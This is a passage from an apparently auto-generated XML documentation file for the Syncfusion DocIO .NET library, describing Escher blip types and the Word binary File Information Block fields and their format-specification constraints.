        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBI.msobiClient">
            <summary>
            Clients should set this bit
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType">
            <summary>
            GEL provided types...
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType.msoblipERROR">
            <summary>
            An error occured during loading
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType.msoblipUNKNOWN">
            <summary>
            An unknown blip type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType.msoblipEMF">
            <summary>
            Windows Enhanced Metafile
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType.msoblipWMF">
            <summary>
            Windows Metafile
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType.msoblipPICT">
            <summary>
            Macintosh PICT
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType.msoblipJPEG">
            <summary>
            JFIF
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType.msoblipPNG">
            <summary>
            PNG
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType.msoblipDIB">
            <summary>
            Windows DIB
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType.msoblipFirstClient">
            <summary>
            First client defined blip type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipType.msoblipLastClient">
            <summary>
            Last client defined blip type
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipUsage">
            <summary>
            Blip usage
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipUsage.msoblipUsageDefault">
            <summary>
            All non-texture fill blips get this.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipUsage.msoblipUsageTexture">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.MSOBlipUsage.msoblipUsageMax">
            <summary>
            Since this is stored in a byte
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.BlipFopte">
            <summary>
            Blip Foptes
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BlipFopte.pib">
            <summary>
            Blip to display
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BlipFopte.pibName">
            <summary>
            Blip file name
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BlipFopte.pibFlags">
            <summary>
            Blip flags
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BlipFopte.pictureTransparent">
            <summary>
            transparent color (none if ~0UL) 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Escher.BlipFopte.NoLineDrawDash">
            <summary>
            Draw a dashed line if no line
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.MSOFBT">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Escher.CompressionMethod">
            <summary>
            
            </summary>
        </member>
        <member name="T:DocInfo">
            <summary>
            DocInfo contains stream component data blocks.
            </summary>
        </member>
        <member name="M:DocInfo.#ctor(Syncfusion.DocIO.ReaderWriter.StreamsManager)">
            <summary>
            Initializes a new instance of the <see cref="T:DocInfo"/> class.
            </summary>
            <param name="streamsManager">The streams manager.</param>
        </member>
        <member name="M:DocInfo.GetImageReader(Syncfusion.DocIO.ReaderWriter.StreamsManager,System.Int32,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Returns WordImageReader depending on the offset
            </summary>
            <param name="streamsManager"></param>
            <param name="offset"> offset in Data stream of the current image </param>
            <returns></returns>
        </member>
        <member name="M:DocInfo.Close">
            <summary>
            
            </summary>
        </member>
        <member name="P:DocInfo.Fib">
            <summary>
            Gets the fib.
            </summary>
            <value>
            The fib.
            </value>
        </member>
        <member name="P:DocInfo.TablesData">
            <summary>
            Gets the tables data.
            </summary>
            <value>The tables data.</value>
        </member>
        <member name="P:DocInfo.FkpData">
            <summary>
            Gets the FKP data.
            </summary>
            <value>The FKP data.</value>
        </member>
        <member name="P:DocInfo.ImageWriter">
            <summary>
            Gets the image writer.
            </summary>
            <value>The image writer.</value>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Fib"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.Initialize">
            <summary>
            Initializes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.InitializeBeforeRead">
            <summary>
            Initializes the before reading the document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.Read(System.IO.Stream)">
            <summary>
            Reads the Fib records from the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.ReadAfterDecryption(System.IO.Stream)">
            <summary>
            Reads the Fib records from the decrypted stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.ReadInternal(System.IO.Stream)">
            <summary>
            Reads the Fib records after 64 bytes - cslw from the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.ValidateCbRgFcLcb">
            <summary>
            Validates the cbRgFcLcb.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.ValidateCswNew">
            <summary>
            Validates the CSW new.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.CorrectFib">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.Write(System.IO.Stream,System.UInt16)">
            <summary>
            Writes the Fib records to the specified stream.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.WriteInternal(System.IO.Stream)">
            <summary>
            Writes the internal.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.WriteAfterEncryption(System.IO.Stream)">
            <summary>
            Writes the after encryption.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.UpdateFcMac">
            <summary>
            Updates the fcMac.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Fib.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibVersion">
            <summary>
            Gets the fib version determined in the Word document as per file format specifications.
            </summary>
            <value>
            The fib version.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.WIdent">
            <summary>
            Gets or sets an unsigned integer that specifies that this is a Word Binary File. This value MUST be 0xA5EC.
            </summary>
            <value>
            The w ident.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.NFib" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.BaseUnused">
            <summary>
            Gets or sets the unused value. 
            This value is undefined and MUST be ignored.
            </summary>
            <value>
            The BaseUnused.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.Lid">
            <summary>
            Gets or sets a LID that specifies the install language of the application that is producing the document. 
            If nFib is 0x00D9 or greater, then any East Asian install lid or any install lid with a base language of Spanish, German or French MUST be recorded as lidAmerican. 
            If the nFib is 0x0101 or greater, then any install lid with a base language of Vietnamese, Thai, or Hindi MUST be recorded as lidAmerican.
            </summary>
            <value>
            The lid.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.PnNext">
            <summary>
            Gets or sets an unsigned integer that specifies the offset in the WordDocument stream of the FIB for the document which contains all the AutoText items. 
            If this value is 0, there are no AutoText items attached. Otherwise the FIB is found at file location pnNext�512. 
            If fGlsy is 1 or fDot is 0, this value MUST be 0. 
            If pnNext is not 0, each FIB MUST share the same values for FibRgFcLcb97.fcPlcBteChpx, FibRgFcLcb97.lcbPlcBteChpx, FibRgFcLcb97.fcPlcBtePapx, FibRgFcLcb97.lcbPlcBtePapx, and FibRgLw97.cbMac.
            </summary>
            <value>
            The pn next.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FDot">
            <summary>
            Gets or sets a value specifies whether this is a document template (1).
            </summary>
            <value>
              <c>true</c> if this is a document template; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FGlsy">
            <summary>
            Gets or sets a value specifies whether this is a document that contains only AutoText items (see FibRgFcLcb97.fcSttbfGlsy, FibRgFcLcb97.fcPlcfGlsy and FibRgFcLcb97.fcSttbGlsyStyle).
            </summary>
            <value>
              <c>true</c> if this is a document that contains only AutoText items; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FComplex">
            <summary>
            Gets or sets a value specifies that the last save operation that was performed on this document was an incremental save operation.
            </summary>
            <value>
              <c>true</c> if fComplex; otherwise, <c>false</c>.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FHasPic" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.CQuickSaves">
            <summary>
            Gets or sets an unsigned integer.
            If nFib is less than 0x00D9, then cQuickSaves specifies the number of consecutive times this document was incrementally saved.
            If nFib is 0x00D9 or greater, then cQuickSaves MUST be 0xF.
            </summary>
            <value>
            The c quick saves.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FEncrypted">
            <summary>
            Gets or sets a value specifies whether the document is encrypted or obfuscated as specified in Encryption and Obfuscation.
            </summary>
            <value>
              <c>true</c> if the document is encrypted or obfuscated; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FWhichTblStm">
            <summary>
            Gets or sets a value specifies the Table stream to which the FIB refers. When this value is set to 1, use 1Table; when this value is set to 0, use 0Table.
            </summary>
            <value>
              <c>true</c> if the Table stream is 1Table; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FReadOnlyRecommended">
            <summary>
            Gets or sets a value specifies whether the document author recommended that the document be opened in read-only mode.
            </summary>
            <value>
            <c>true</c> if the document to be opened in read-only mode; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FWriteReservation">
            <summary>
            Gets or sets a value specifies whether the document has a write-reservation password.
            </summary>
            <value>
              <c>true</c> if the document has a write-reservation password; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FExtChar">
            <summary>
            Gets or sets a value indicating ext character.
            This value MUST be 1.
            </summary>
            <value>
              <c>true</c> if ext character; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FLoadOverride">
            <summary>
            Gets or sets a value specifies whether to override the language information and font that are specified in the paragraph style at istd 0 (the normal style) with the defaults that are appropriate for the installation language of the application.
            </summary>
            <value>
              <c>true</c> if load override; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FFarEast">
            <summary>
            Gets or sets a value specifies whether the installation language of the application that created the document was an East Asian language.
            </summary>
            <value>
              <c>true</c> if far east; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FObfuscated">
            <summary>
            Gets or sets a value specifies whether the document is obfuscated by using XOR obfuscation.
            If fEncrypted is 1, this bit specifies whether the document is obfuscated by using XOR obfuscation (section 2.2.6.1); otherwise, this bit MUST be ignored.
            </summary>
            <value>
              <c>true</c> if the document is obfuscated by using XOR obfuscation; otherwise, <c>false</c>.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.NFibBack" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.LKey">
            <summary>
            Gets or sets the key.
            If fEncrypted is 1 and fObfuscation is 1, this value specifies the XOR obfuscation (section 2.2.6.1) password verifier. 
            If fEncrypted is 1 and fObfuscation is 0, this value specifies the size of the EncryptionHeader that is stored at the beginning of the Table stream as described in Encryption and Obfuscation. 
            Otherwise, this value MUST be 0.
            </summary>
            <value>
            The l key.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.Envr">
            <summary>
            Gets or sets the envr.
            This value MUST be 0, and MUST be ignored.
            </summary>
            <value>
            The envr.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FMac">
            <summary>
            Gets or sets a value indicating whether mac.
            This value MUST be 0, and MUST be ignored.
            </summary>
            <value>
              <c>true</c> if mac; otherwise, <c>false</c>.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FEmptySpecial" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FLoadOverridePage">
            <summary>
            Gets or sets a value specifies whether to override the section properties for page size, orientation, and margins with the defaults that are appropriate for the installation language of the application.
            </summary>
            <value>
              <c>true</c> if load override page; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.BaseReserved1">
            <summary>
            Gets or sets a value indicating the reserved1.
            This value is undefined and MUST be ignored.
            </summary>
            <value>
              <c>true</c> if reserved1; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.BaseReserved2">
            <summary>
            Gets or sets a value indicating the reserved2.
            This value is undefined and MUST be ignored.
            </summary>
            <value>
              <c>true</c> if reserved2; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FSpare0">
            <summary>
            Gets or sets the spare0.
            This value is undefined and MUST be ignored.
            </summary>
            <value>
            The f spare0.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.BaseReserved3">
            <summary>
            Gets or sets a value indicating the reserved3.
            This value MUST be 0 and MUST be ignored.
            </summary>
            <value>
            The reserved3.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.BaseReserved4">
            <summary>
            Gets or sets a value indicating the reserved4.
            This value MUST be 0 and MUST be ignored.
            </summary>
            <value>
            The reserved4.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.BaseReserved5">
            <summary>
            Gets or sets a value indicating the reserved5.
            This value is undefined and MUST be ignored.
            </summary>
            <value>
            The reserved5.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.BaseReserved6">
            <summary>
            Gets or sets a value indicating the reserved6.
            This value is undefined and MUST be ignored.
            </summary>
            <value>
            The reserved6.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.Csw">
            <summary>
            Gets or sets an unsigned integer that specifies the count of 16-bit values corresponding to fibRgW that follow. MUST be 0x000E.
            </summary>
            <value>
            The CSW.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved1">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg w reserved1.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved2">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg w reserved2.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved3">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg w reserved3.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved4">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg w reserved4.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved5" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved6" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved7" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved8" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved9" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved10" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved11" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved12" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWReserved13" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgWLidFE">
            <summary>
            A LID whose meaning depends on the nFib value. Gets or sets the lid fe.
            </summary>
            <value>
            The lid fe.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.Cslw">
            <summary>
            Gets or sets an unsigned integer that specifies the count of 32-bit values corresponding to fibRgLw that follow. MUST be 0x0016.
            </summary>
            <value>
            The CSLW.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.CbMac">
            <summary>
            Specifies the count of bytes of those written to the WordDocument stream of the file that have any meaning. Gets or sets the cb mac.
            </summary>
            <value>
            The cb mac.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved1">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The rg lw reserved1.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved2">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The rg lw reserved2.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.CcpText">
            <summary>
            Specifies the count of CPs in the main document. Gets or sets the CCP text.
            </summary>
            <value>
            The CCP text.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.CcpFtn">
            <summary>
            Specifies the count of CPs in the footnote subdocument. Gets or sets the CCP FTN.
            </summary>
            <value>
            The CCP FTN.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.CcpHdd">
            <summary>
            Specifies the count of CPs in the header subdocument. Gets or sets the CCP HDD.
            </summary>
            <value>
            The CCP HDD.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved3">
            <summary>
            Gets or sets this value MUST be zero and MUST be ignored.
            </summary>
            <value>
            The rg lw reserved3.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.CcpAtn">
            <summary>
            Specifies the count of CPs in the comment subdocument. Gets or sets the CCP atn.
            </summary>
            <value>
            The CCP atn.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.CcpEdn">
            <summary>
            Specifies the count of CPs in the endnote subdocument. Gets or sets the CCP edn.
            </summary>
            <value>
            The CCP edn.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.CcpTxbx">
            <summary>
            Specifies the count of CPs in the textbox subdocument of the main document. Gets or sets the CCP TXBX.
            </summary>
            <value>
            The CCP TXBX.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.CcpHdrTxbx">
            <summary>
            Specifies the count of CPs in the textbox subdocument of the header. Gets or sets the CCP HDR TXBX.
            </summary>
            <value>
            The CCP HDR TXBX.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved4">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The rg lw reserved4.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved5">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The rg lw reserved5.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved6">
            <summary>
            Gets or sets the rg lw reserved6.
            </summary>
            <value>
            The rg lw reserved6.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved7">
            <summary>
            Gets or sets this value is undefined and MUST be ignored
            </summary>
            <value>
            The rg lw reserved7.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved8">
            <summary>
            Gets or sets this value is undefined and MUST be ignored
            </summary>
            <value>
            The rg lw reserved8.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved9">
            <summary>
            Gets or sets the rg lw reserved9.
            </summary>
            <value>
            The rg lw reserved9.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved10">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The rg lw reserved10.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved11">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The rg lw reserved11.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved12" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved13">
            <summary>
            Gets or sets this value MUST be zero and MUST be ignored.
            </summary>
            <value>
            The rg lw reserved13.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.RgLwReserved14">
            <summary>
            Gets or sets this value MUST be zero and MUST be ignored.
            </summary>
            <value>
            The rg lw reserved14.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.CbRgFcLcb">
            <summary>
            Gets or sets an unsigned integer that specifies the count of 64-bit values corresponding to fibRgFcLcbBlob that follow.
            This MUST be one of the following values, depending on the value of nFib.
            Value of nFib   cbRgFcLcb
            0x00C1          0x005D
            0x00D9          0x006C
            0x0101          0x0088
            0x010C          0x00A4
            0x0112          0x00B7
            </summary>
            <value>
            The cb rg fc LCB.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcStshfOrig">
            <summary>the fib rg fc LCB97 fc STSHF original.
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc STSHF original.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbStshfOrig">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 LCB STSHF original.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcStshf">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. An STSH that specifies the
            style sheet for this document begins at this offset.
             </summary>
             <value>
             The fc STSHF.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbStshf">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the STSH that begins at offset 
            fcStshf in the Table Stream. This MUST be a nonzero value.
             </summary>
             <value>
             The LCB STSHF.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcffndRef">
            <summary>
            Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcffndRef begins at this 
            offset and specifies the locations of footnote references in the Main Document, and whether those references
            use auto-numbering or custom symbols. If lcbPlcffndRef is zero, fcPlcffndRef is undefined and MUST be 
            ignored.
            </summary>
            <value>
            The fc PLCFFND reference.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcffndRef">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcffndRef that begins at offset
            fcPlcffndRef in the Table Stream.
             </summary>
             <value>
             The LCB PLCFFND reference.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcffndTxt">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcffndTxt begins at this
            offset and specifies the locations of each block of footnote text in the Footnote Document. If lcbPlcffndTxt
            is zero, fcPlcffndTxt is undefined and MUST be ignored.
             </summary>
             <value>
             The fc PLCFFND text.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcffndTxt">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcffndTxt that begins at offset
            fcPlcffndTxt in the Table Stream.
             </summary>
             <value>
             The LCB PLCFFND text.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfandRef">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfandRef begins at this
            offset and specifies the dates, user initials, and locations of comments in the Main Document. If
            lcbPlcfandRef is zero, fcPlcfandRef is undefined and MUST be ignored.
             </summary>
             <value>
             The fc plcfand reference.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97lcbPlcfandRef">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfandRef at offset fcPlcfandRef
            in the Table Stream.
             </summary>
             <value>
             The LCB plcfand reference.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfandTxt">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfandTxt begins at this
            offset and specifies the locations of comment text ranges in the Comment Document. If lcbPlcfandTxt is zero,
            fcPlcfandTxt is undefined, and MUST be ignored.
             </summary>
             <value>
             The fc plcfand text.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfandTxt">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfandTxt at offset fcPlcfandTxt
            in the Table Stream.
             </summary>
             <value>
             The LCB plcfand text.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfSed">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfSed begins at this
            offset and specifies the locations of property lists for each section in the Main Document. If lcbPlcfSed is
            zero, fcPlcfSed is undefined and MUST be ignored.
             </summary>
             <value>
             The LCB plcfand text.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfSed">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the PlcfSed that begins at offset 
            fcPlcfSed in the Table Stream.
             </summary>
             <value>
             The LCB PLCF sed.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcPad">
            <summary>
            Gets or sets this value is undefined and MUST be ignored.
            </summary>
            <value>
            The fib rg fc LCB97 fc PLC pad.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcPad">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The fc PLC pad.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfPhe" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbPlcfPhe">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the Plc at offset fcPlcfPhe in the
            Table Stream.
             </summary>
             <value>
             The LCB PLCF phe.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcSttbfGlsy">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. A SttbfGlsy that contains
            information about the AutoText items that are defined in this document begins at this offset.
             </summary>
             <value>
             The fc STTBF glsy.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97LcbSttbfGlsy">
             <summary>
             Gets or sets An unsigned integer that specifies the size, in bytes, of the SttbfGlsy at offset fcSttbfGlsy
            in the Table Stream. If base.fGlsy of the Fib that contains this FibRgFcLcb97 is zero, this value MUST be
            zero.
             </summary>
             <value>
             The LCB STTBF glsy.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb97FcPlcfGlsy">
             <summary>
             Gets or sets An unsigned integer that specifies an offset in the Table Stream. A PlcfGlsy that contains
            information about the AutoText items that are defined in this document begins at this offset.
             </summary>
             <value>
             The fc PLCF glsy.
             </value>
        </member>
